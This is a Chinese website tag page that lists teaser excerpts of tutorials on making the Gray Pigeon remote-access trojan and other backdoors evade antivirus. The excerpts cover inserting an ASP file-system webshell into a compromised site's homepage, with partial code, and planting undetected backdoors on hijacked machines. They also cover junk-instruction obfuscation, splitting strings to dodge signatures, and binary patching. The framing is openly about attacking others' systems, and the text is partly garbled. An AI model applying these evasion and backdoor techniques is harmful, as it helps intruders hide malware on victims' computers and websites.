专注于互联网--专注于架构

 最新标签
网站地图
文章索引
Rss订阅

首页 »标签 » 免杀工具 » 列表

灰鸽子免杀:插入式免杀后门  将后门放到对方主页里
昨天也不知怎就搞到中国域名网权限了搞了很久有自动备份 转入正题: 1.随便找他个页面然后把如下内容分开插入到它主页了注意下上下文内容(fso): <% dim objFSO %> <% dim fdata %> <% dim objCountFile %> <% on error resume next %> <% Set objFSO = Server.createObject("Scripting.FileObject") %> <% Trim(request("syfdpath"))& [阅读全文] [PDF]
标签:免杀工具 免杀工具包 免杀教程 灰鸽子免杀
灰鸽子免杀:【免杀花指令编写手册】-基础篇
.花指令概念: 花指令是堆汇编指令组成,对于来说,是堆废话,加不加花指令都 不影响正常运行.编写花指令要终始保持堆栈平衡. 2.写花指令原则: 写花指令基本原则就是要保持堆栈平衡. 写花指令细细品味下面段比喻: 我们把段花指令比喻成道数学运算题,把汇编指令(push pop等)比喻成加减 乘除,把寄存器或数据(eax,ebx,1等)比喻成 数字(1,2,3等),那么要保持花指令堆栈平衡,等于保持这道数学题结果是0 . 3.解释些指令含意 push ebp ----把基址指针寄存器压入堆栈 pop ebp ----把基址指针寄存器弹出堆栈 push eax --- [阅读全文] [PDF]
标签:免杀工具 免杀工具包 免杀教程 灰鸽子免杀
灰鸽子免杀:给你的肉鸡中免杀的后门
 测试环境:Windows Server 2003 Sp1. 磁盘格式NTFS  这里免杀跟加壳改特征码点关系都没有.所以新手不要害怕.我般呢就是在肉鸡上种Radmin+灰鸽子+500)this.width=500" border=0> 看到了吧.如果释放出来.就应该不会被杀了.(不过在我测试中发现那txt文本也会被卡巴XX掉.可能是卡巴太厉害了吧.) 上篇文章: 成为顶级黑客必备软件Software [阅读全文] [PDF]
标签:免杀工具 免杀工具包 免杀教程 灰鸽子免杀
灰鸽子免杀:逆向工程打造免杀后门(续《逆向工程 打造隐蔽后门》)
文章作者:无敌最寂寞[-273℃@EST] 信息来源:邪恶 8进制 中国 以前在x上发表过篇逆向工程 打造隐蔽后门文章讲述了如何在个可执行文件中嵌入后门代码思路方法但是这种思路方法很有可能被杀毒软件Software给查到因此这次我们要打造免杀后门 先看看我们需要什么“家伙”: Olly debug 1.10b 汉化版 —— 逆向主要工具 UltraEdit —— 经典16进制编辑器 PEDITOR v1.7 —— PE文件编辑工具 dcmd —— 个简单邦定81端口后门会被瑞星查杀 [阅读全文] [PDF]
标签:免杀工具包 免杀工具 免杀教程 灰鸽子免杀
灰鸽子免杀:插入式免杀后门--将后门放到对方主页里
作者:cnqing 来自:朋友家http://friend.91eb.com 昨天也不知怎就搞到中国域名网权限了搞了很久有自动备份 转入正题: 1.随便找他个页面然后把如下内容分开插入到它主页了注意下上下文内容(fso): <% dim objFSO %> <% dim fdata %> <% dim objCountFile %> <% _disibledevent=> <% Trim(request("syfdpath"))<>"" then %> &l [阅读全文] [PDF]
标签:免杀工具包 免杀工具 免杀教程 灰鸽子免杀
灰鸽子免杀:免杀字符串心得体会
  下面是修改详细思路方法(我用”explorer.exe”作为例子修改)   1、   # //加个头文件   /*……*/   char *str1,*str2,*str3,*str4;   strcpy (str1,”exp”); //复制”exp”到str1   strcpy (str2,”plorer”);   strcpy (str3,”exe”);   strcat (str1,str2); //将str2连接到str1后   strcat (str2,str3);   strcpy (str4,str3); //str4值为”explorer.exe”   2、    [阅读全文] [PDF]
标签:免杀壳 免杀工具 免杀教程 灰鸽子免杀
免杀汇编:免杀技术需要掌握的汇编知识
Ultraedit打开,编辑exe文件时你会看到许许多多的由0、1、2、3、4、5、6、7、8、9、A、B、C、D、E、F组成的数码,这些数码就是机器码。修改程序时必须通过修改机器码来修改exe文件。二.需要熟练掌握的全部汇编知识 不大容易理解,可先强行背住,混个脸儿熟,以后慢慢的就理解了。 cmp a,b 比较a与b。 mov a,b 把b的值送给a。 ret 返回主程序。 nop 无作用,英文“no operation”的简写,意思是“do nothing”(机器码90)***机器码的含义参看上面。 (解释:ultraedit打开编辑exe文件时你看到90,等同于汇编语句no [阅读全文] [PDF]
标签:免杀教程 免杀工具 灰鸽子免杀 免杀汇编
1 共7条 分1页

最新标签

热门标签

精华推荐

Dig排行

阅读排行

最新文章